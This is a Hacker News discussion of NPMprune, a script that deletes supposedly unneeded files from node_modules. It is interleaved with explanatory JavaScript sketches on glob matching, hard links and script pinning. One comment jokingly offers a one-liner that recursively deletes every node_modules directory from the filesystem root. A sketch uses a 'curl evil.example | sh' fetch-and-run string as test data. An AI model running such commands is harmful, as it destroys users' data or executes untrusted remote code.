[HN Gopher] NPMprune: Remove unnecessary files from node_modules...
       ___________________________________________________________________
        
       NPMprune: Remove unnecessary files from node_modules to optimize
       storage
        
       Author : arthurwhite
       Score  : 36 points
       Date   : 2023-11-29 17:14 UTC (5 hours ago)
        
        
       | lxe wrote:
       | We did exactly this when packaging and deploying large node
       | manifests at one of my former companies.
       | 
       | Be super careful of removing large swaths of files. Out of
       | 150,000 node modules in your manifest, I'm willing to bet at
       | least one of them is doing something by reading one of these non-
       | source files.
        
         | sbarre wrote:
         | This was my concern as well.
         | 
         | Looking at the script source, it's just matching globs, so
         | there isn't much smarts to this. I'm sure it works most of the
         | time, but yeah..
         | 
         | Do JS packages need some kind of .prodignore file similar to
         | other .ignore files?
         | 
         | So with a flag passed, after doing an npm install, there's an
         | extra cleanup step that removes explicitly marked files that
         | aren't needed for running in prod?
         | 
         | (Not a fully formed idea, I'm sure I'm not thinking of
         | drawbacks with this)
         | 
         | Edit: this sort of exists as the .npmignore file?
         | 
         | https://docs.npmjs.com/cli/v10/using-npm/developers#keeping-...
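To make the "just matching globs" concern concrete, here is a minimal sketch of a glob-based pruner in dry-run mode. The pattern list and the package layout are hypothetical, chosen for illustration; they are not NPMprune's actual patterns. Only `*` is supported as a wildcard.

```javascript
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");

// Hypothetical patterns for illustration; not NPMprune's real list.
const PATTERNS = ["*.md", "*.map", "LICENSE*"];

// Convert a simple glob (only `*` is supported) into an anchored RegExp.
function globToRegExp(glob) {
  const escaped = glob.replace(/[.+?^${}()|[\]\\]/g, "\\$&");
  return new RegExp("^" + escaped.replace(/\*/g, ".*") + "$");
}

// Walk `root` and return the relative paths of files whose names match a pattern.
// Nothing is deleted: this is a dry run.
function findPrunable(root, patterns = PATTERNS) {
  const regexes = patterns.map(globToRegExp);
  const hits = [];
  const walk = (dir) => {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      const full = path.join(dir, entry.name);
      if (entry.isDirectory()) walk(full);
      else if (regexes.some((re) => re.test(entry.name))) {
        hits.push(path.relative(root, full));
      }
    }
  };
  walk(root);
  return hits.sort();
}

// Demo on a throwaway tree with a made-up package.
const root = fs.mkdtempSync(path.join(os.tmpdir(), "prune-demo-"));
const pkg = path.join(root, "node_modules", "some-pkg");
fs.mkdirSync(pkg, { recursive: true });
for (const name of ["index.js", "README.md", "index.js.map", "template.md"]) {
  fs.writeFileSync(path.join(pkg, name), "");
}
const candidates = findPrunable(root);
console.log(candidates);
fs.rmSync(root, { recursive: true, force: true });
```

The matcher flags `template.md` alongside `README.md`: it only sees names, so it cannot tell documentation from a file the package might read at runtime.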
        
           | rezonant wrote:
           | .npmignore is the opposite of `files`, it omits files when
           | creating the package itself, that's different than trimming
           | the files when the package is installed. That said,
           | files/npmignore is the correct way to deal with this and you
           | should never remove files from the packages you install
           | without extremely good reasons, and when you do it, it should
           | be very narrowly scoped and handled automatically as part of
           | npm install. It should be totally valid to delete
           | node_modules and reinstall everything without causing
           | problems. This is also the biggest reason to never commit
           | node_modules, aside from the pure insanity of committing
           | hundreds of thousands of vendor-managed files and inviting
           | merge conflicts when two branches change those files...
        
         | QuadmasterXLII wrote:
         | Test and bifurcate I guess.
        
           | lxe wrote:
           | In production, preferably. This way you'll immediately find
           | any issues and will have top priority allocated to fixing
           | them.
        
       | armchairhacker wrote:
       | I use https://pnpm.io whenever possible. It has many benefits,
       | the main one is that the node modules are symlinked to one big
       | repo in your home directory, so there isn't nearly as much
       | duplication.
        
         | rpastuszak wrote:
         | Yup, same here. I've saved 40 GB of data by recursively removing
         | all node_modules directories from my Mac and replacing npm with
         | pnpm.
         | 
         | I did notice small issues with some libraries (react testing
         | library IIRC)
        
         | paulddraper wrote:
         | *hard linked
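For readers unsure why hard links avoid duplication, here is a small sketch using only Node's `fs` module. The file names are made up; they stand in for a file in a shared store and its counterpart inside a project. As far as I understand pnpm's design, it hard-links files from its store and uses symlinks for the package layout, so both descriptions in this subthread are partly right, but the sketch only demonstrates the hard-link half.

```javascript
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");

const dir = fs.mkdtempSync(path.join(os.tmpdir(), "link-demo-"));
const storeFile = path.join(dir, "store-copy.js"); // stands in for the shared store
const projectFile = path.join(dir, "project-copy.js"); // stands in for node_modules

fs.writeFileSync(storeFile, "module.exports = 42;\n");
fs.linkSync(storeFile, projectFile); // hard link: a second name for the same data

const a = fs.statSync(storeFile);
const b = fs.statSync(projectFile);
const sameInode = a.ino === b.ino; // both names point at one inode
const linkCount = a.nlink; // number of names referring to that inode
console.log({ sameInode, linkCount });

fs.rmSync(dir, { recursive: true, force: true });
```

Because both paths refer to the same inode, the contents are stored once no matter how many projects link to them.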
        
         | akoboldfrying wrote:
         | Curious whether this works on Windows? Symlinks are strange
         | there (though hard links work fine on NTFS).
        
           | otteromkram wrote:
           | If you don't want to risk adding something nefarious to your
           | Google history, DuckDuckGo is a nice alternative.
           | 
           | As my ol' grandpappy used to say, "Why wonder? Let's go
           | search the Internets!"
        
         | thekevinscott wrote:
         | Another vote for pnpm.
         | 
         | Was introduced at work and it's a game changer. The monorepo
         | support (via "workspace:*") is absolutely clutch too.
        
       | swatcoder wrote:
       | > In deployment scripts:
       | >
       | > wget -qO- https://raw.githubusercontent.com/xthezealot/npmprune/master... | sh -- -p
       | 
       | Serious question: Is this the norm now? Are people actually
       | executing unversioned wget'd shell scripts from random github
       | users as part of their deployment workflow?
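One way to address the "unversioned" part is to pin the script to a digest recorded when someone last reviewed it, and refuse to run anything else. The sketch below is an assumption about how that could look, not something the project documents; the script contents are a stand-in, and in a real pipeline the digest would be a hard-coded constant rather than computed on the spot.

```javascript
const crypto = require("node:crypto");

function sha256(text) {
  return crypto.createHash("sha256").update(text, "utf8").digest("hex");
}

// Throws unless the downloaded script matches the digest recorded at review time.
function assertPinned(script, expectedDigest) {
  const actual = sha256(script);
  if (actual !== expectedDigest) {
    throw new Error(`script digest mismatch: got ${actual}`);
  }
  return script;
}

// Stand-in contents; in a real pipeline these would come from the download.
const reviewed = "#!/bin/sh\necho pruning\n";
const pinnedDigest = sha256(reviewed); // normally a constant in the deploy config

const okScript = assertPinned(reviewed, pinnedDigest);

let tamperedRejected = false;
try {
  assertPinned(reviewed + "curl evil.example | sh\n", pinnedDigest);
} catch {
  tamperedRejected = true;
}
console.log({ tamperedRejected });
```

Fetching from a URL that names a specific commit instead of `master` gets a similar effect with less machinery.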
        
         | petesergeant wrote:
         | > now
         | 
         | For about the last 15 years
        
           | mobilio wrote:
           | also
           | 
           | curl ... | sudo bash
        
           | dunham wrote:
           | And before the web existed, people would distribute software
           | packaged inside executable shell scripts
           | (https://en.wikipedia.org/wiki/Shar).
           | 
           | It looks like that practice goes back at least 40 years.
        
         | nailer wrote:
         | The threat model is exactly the same as executing untrusted,
         | uninspected content you've downloaded locally.
         | 
         | I could do some tricks where I sent different files based on
         | user agent, but still... most people aren't inspecting the
         | download anyway before running it.
        
           | im3w1l wrote:
           | > I could do some tricks where I sent different files based
           | on user agent
           | 
           | Not from githubusercontent you couldn't. Which I'd say is
           | where the majority of these scripts are hosted.
        
       | c0n5pir4cy wrote:
       | Just for package authors (or people looking for some easy pull
       | requests) out there that might not know this exists.
       | 
       | npm's package.json has a `files` field which allows you to define
       | which files are included in the published package, and therefore
       | in an npm install:
       | https://docs.npmjs.com/cli/v6/configuring-npm/package-json#f....
       | 
       | This also extends to an .npmignore file that works similarly to a
       | .gitignore file.
        
         | creatonez wrote:
         | Just beware that some files may seem unnecessary but are
         | expected from an idiomatic npm package. Three things that come
         | to mind -- a markdown file named README.md, any generated
         | typescript definitions, and typescript/babel sourcemaps. And
         | something I've seen far too often: please don't give a
         | minified, rolled up bundle as the only option, otherwise you
         | are chucking your library's users back into the dark ages of
         | Bower.js.
        
           | nfriedly wrote:
           | The readme gets included automatically even if you don't
           | specify it in the files field, ditto for the changelog,
           | license, and package.json.
           | 
           | Compare https://github.com/express-rate-limit/express-rate-limit/blo...
           | to https://www.npmjs.com/package/express-rate-limit?activeTab=c...
           | 
           | Agree with you about the other points.
        
           | rezonant wrote:
           | Strongly agree on minification. You should not minify or
           | bundle anything in your NPM package. That decision should
           | only be made by the top level project if it wishes.
        
           | josephg wrote:
           | Yep. And if you're writing typescript, please include type
           | definitions, source maps, type definition source maps and the
           | original typescript source.
           | 
           | Having all of this stuff makes it possible to ctrl+click on
           | functions in my libraries and read the corresponding source
           | code. That's a godsend during development - well worth a few
           | extra kb of files in the npm module.
           | 
           | tsconfig.json:
           | 
           |     "declaration": true,
           |     "declarationMap": true,
           |     "sourceMap": true,
           |     ...
           | 
           | package.json (assuming typescript compiles src/ to dist/):
           | 
           |     "files": [
           |       "dist/*",
           |       "src/*"
           |     ],
        
             | shepherdjerred wrote:
             | It makes me wonder why these are even configurable. These
             | should all be emitted by default.
        
         | arthurwhite wrote:
         | If everyone used the `files` field, the world would be a better
         | place, for sure.
        
       | an_ko wrote:
       | This is wildly unsafe.
       | 
       | - Some packages contain non-JS files for good reasons, and they
       | may break in subtle unpredictable ways when you mess with the
       | contents of their package.
       | 
       | - Node.js will happily run JavaScript files even if they're not
       | "*.js": A file like "hello.alsdfhlshdfl" works just fine as long
       | as its content parses. There is no guarantee that your
       | dependencies (and their recursive dependencies) don't statically
       | or dynamically load files with completely arbitrary filenames.
       | 
       | - If you distribute packages with license files stripped this
       | way, you are violating licenses that require the license to be
       | distributed along with the code.
       | 
       | If this is actually a major issue for you, consider instead
       | sending PRs to upstream to tidy up their package. This will also
       | benefit other users.
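The point about file extensions is easy to check. The sketch below assumes CommonJS `require`, which, in the Node versions I'm aware of, falls back to treating an unrecognized extension as JavaScript. The file name is borrowed from the comment above; the temp directory is just scaffolding.

```javascript
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");

const dir = fs.mkdtempSync(path.join(os.tmpdir(), "ext-demo-"));
const file = path.join(dir, "hello.alsdfhlshdfl");

// Valid JavaScript behind an extension no glob would recognize as code.
fs.writeFileSync(file, "module.exports = () => 'hello';\n");

const loaded = require(file); // unknown extension, loaded as CommonJS
const greeting = loaded();
console.log(greeting);

fs.rmSync(dir, { recursive: true, force: true });
```

A pruner that decides by extension has no way to know this file is executable code.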
        
         | arthurwhite wrote:
         | - Of course, this entails the risk of occasional breakage. But
         | for 99% of modules, this has no impact at runtime.
         | 
         | - The patterns used to find files are specific enough to target
         | only those files that are well known to be useless at runtime.
         | 
         | - The license texts of these libraries can be copied and merged
         | into a main LICENSE file.
         | 
         | - Have you seen the number of modules installed by most major
         | libraries? Making a pull request for each of them is humanly
           | impossible and counter-productive. It's easier to use a simple
           | script that frees dozens of MB in a few seconds.
        
           | swatcoder wrote:
           | > But for 99% of modules, this has no impact at runtime.
           | 
           | Traditionally, this wasn't an acceptable way to think about
           | projects we engineers were being paid lots of money to build.
           | 
           | As you note, a project may hoover in some absurd number of
           | dependent libraries and you have no tooling that tells you
           | which of those might fall in the 1% and what code paths in
           | those 1% intersect with call stacks in your project. You have
           | no idea what impact blindly deleting some "They're probably
           | unnecessary" files in somebody else's code will have on your
           | application and no insight into how to make sure your testing
           | unearths problems. It's an invitation to phantom bugs of
           | unknown scope and the most frustrating kind of debugging
           | effort that comes from chasing those kinds of phantoms.
           | 
           | It's already bad enough that people don't read and review
           | their dependent code with the eye they bring to PRs from
           | their on-team colleagues, but to then go futzing around and
           | deleting things in the unread dependencies because you have a
           | hunch that it's no big deal is about as far from software
           | _engineering_ as you can get.
        
           | akdor1154 wrote:
           | > but for 99% of modules, this has no impact at runtime
           | 
           | So for the typical enterprise crapware where the app template
           | installs about 2,000 packages for a React Hello World, how
           | many broken modules is that?
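Taking the 99% figure at face value, the arithmetic can be sketched as follows. This assumes each package breaks independently with the same 1% probability, which is a simplification made for illustration; the 700 and 2,000 package counts are the ones quoted in this thread.

```javascript
// Assumption: each package breaks independently with the same probability.
function expectedBroken(packages, breakRate) {
  return packages * breakRate;
}

// Probability that at least one package out of `packages` is broken.
function probAtLeastOneBroken(packages, breakRate) {
  return 1 - Math.pow(1 - breakRate, packages);
}

for (const n of [700, 2000]) {
  console.log(
    n,
    expectedBroken(n, 0.01).toFixed(1),
    probAtLeastOneBroken(n, 0.01).toFixed(4)
  );
}
```

Under those assumptions the expected count is about 7 broken packages for a 700-package install and about 20 for 2,000, and the chance of having none at all is well under 1% in both cases.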
        
           | filterfiber wrote:
           | > Of course, this entails the risk of occasional breakage.
           | But for 99% of modules, this has no impact at runtime.
           | 
           | Right, so most projects end up with hundreds of modules (a
           | random one I have has 700+), which would mean multiple breakages.
           | 
           | The worst part isn't the breakage - it's not knowing where or
           | when it breaks, and because it could be missed when it's
           | being bundled it can happen in production.
           | 
           | The bundling step should effectively be doing the file
           | pruning for you (or even parts of files) and you can be a lot
           | more confident that it won't miss things.
           | 
           | node_modules are generally big (580MB in my case), but I
           | don't know why you'd trade reliability for 580MB of storage.
           | For us the 580MB will get bundled under 1MB for our web
           | application, and essentially all dev machines will have 512GB+
           | of storage at this point anyway.
        
       | pavlov wrote:
       | Why not use yarn? It has a much more reliable solution:
       | 
       | https://yarnpkg.com/features/pnp
        
         | arthurwhite wrote:
         | Because its primary focus is on redefining how dependencies are
         | stored and accessed, rather than modifying the contents of
         | these dependencies.
         | 
         | Useless files will still be there.
         | 
         | Also, when you create a Docker image, you avoid packing in dev
         | tools that aren't absolutely essential (such as Yarn).
        
           | butshouldyou wrote:
           | FYI: The default node Docker images already include yarn.
        
       | Alifatisk wrote:
       | Just use pnpm
        
         | arthurwhite wrote:
         | While pnpm optimizes storage and reduces duplication, it does
         | not inherently remove non-essential files (like documentation,
         | Markdown, or test files) within the dependencies.
         | 
         | Also, when you create a Docker image, you avoid packing in dev
         | tools that aren't absolutely essential (such as pnpm).
        
           | nusmella wrote:
           | Even the alpine nodejs images have pnpm and yarn nowadays
        
       | dlrush wrote:
       | Just use PNPM
        
       | Ayesh wrote:
       | Yeah no.
       | 
       | npm already does it at the package registry with .gitignore/.npmignore
       | files, and that's the package author's choice. How much storage
       | can you really save? 50MB? 200MB? Is it really worth the risk of
       | running rm on some glob pattern and crossing your fingers that the
       | packages don't require any of the deleted files?
        
         | arthurwhite wrote:
         | Not everyone uses the .npmignore file. Maybe it's the author's
         | choice, but in the meantime, that's my personal storage space
         | that's being used unnecessarily.
         | 
         | I tested it recently on a clean install of Strapi: about 250 MB
         | are freed up. Storage is cheap but that still represents a lot,
         | especially inside a Docker image.
         | 
         | The patterns used to find files are specific enough to target
         | only those files that are well known to be useless at runtime.
        
           | rezonant wrote:
           | Others have pointed out that you have no idea which files are
           | useless at runtime when inspecting their filename. Executable
           | JS does not need the .js extension to be loaded by Node.js or
           | any other runtime environment, and on server runtimes files
           | can be read at runtime, so JSON files, markdown files,
           | webassembly modules, or any other kind of non-JS content can
           | have a runtime impact.
           | 
           | You are taking a big risk of subtle breakage right now, and a
           | big risk of breakage as you change your project code in the
           | future, as you may start to invoke a code path that needs
           | that resource in the future.
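The "breaks later, on a code path you didn't exercise" failure mode can be reproduced in a few lines. Everything in this sketch is hypothetical: the dependency, its `TEMPLATE.md`, and the `render` function are invented to show the shape of the problem, not taken from a real package.

```javascript
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");

// Build a made-up dependency that reads a Markdown template on one code path.
const pkgDir = fs.mkdtempSync(path.join(os.tmpdir(), "fake-dep-"));
fs.writeFileSync(path.join(pkgDir, "TEMPLATE.md"), "# Hello, {{name}}\n");
fs.writeFileSync(
  path.join(pkgDir, "index.js"),
  [
    "const fs = require('node:fs');",
    "const path = require('node:path');",
    "exports.add = (a, b) => a + b;",
    "exports.render = (name) =>",
    "  fs.readFileSync(path.join(__dirname, 'TEMPLATE.md'), 'utf8').replace('{{name}}', name);",
  ].join("\n")
);

const dep = require(pkgDir);
const before = dep.render("world"); // works while the template exists

// Simulate a glob-based pruner deleting "*.md".
fs.rmSync(path.join(pkgDir, "TEMPLATE.md"));

const sum = dep.add(1, 2); // the commonly used path still works
let errorCode = null;
try {
  dep.render("world"); // the rarely used path now fails
} catch (err) {
  errorCode = err.code;
}
console.log({ before, sum, errorCode });

fs.rmSync(pkgDir, { recursive: true, force: true });
```

The module still loads and its common path passes any smoke test; only the call that touches the deleted file fails, and it fails at runtime.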
        
       | dmitrygr wrote:
       | > Remove unnecessary [...] node_modules
       | 
       | Try this bash one-liner :)
       | 
       |     find / -name node_modules -print0 | xargs -0 rm -rf
        
       | leipert wrote:
       | Yarn@1 has this autoclean feature:
       | https://classic.yarnpkg.com/en/docs/cli/autoclean
       | 
       | I used to use it, but at some point the hassle of the
       | occasionally breaking package wasn't worth it.
        
       | mirekrusin wrote:
       | Just bundle your backend production entrypoint as a single JS file,
       | similar to the frontend.
        
       | joshmanders wrote:
       | Can someone explain to me why this is even necessary? I have at
       | the time of this comment, 32 node projects on my machine, all
       | with their own node_modules, and I'm using less than 200GB
       | (total, including everything else on my machine) of my total 1TB
       | hard drive space...
       | 
       | Are people that concerned about the size of a directory on their
       | machines?
        
         | arthurwhite wrote:
         | Maybe not on their machine, but for Docker images that will be
         | pulled a thousand times, yes.
        
       ___________________________________________________________________
       (page generated 2023-11-29 23:01 UTC)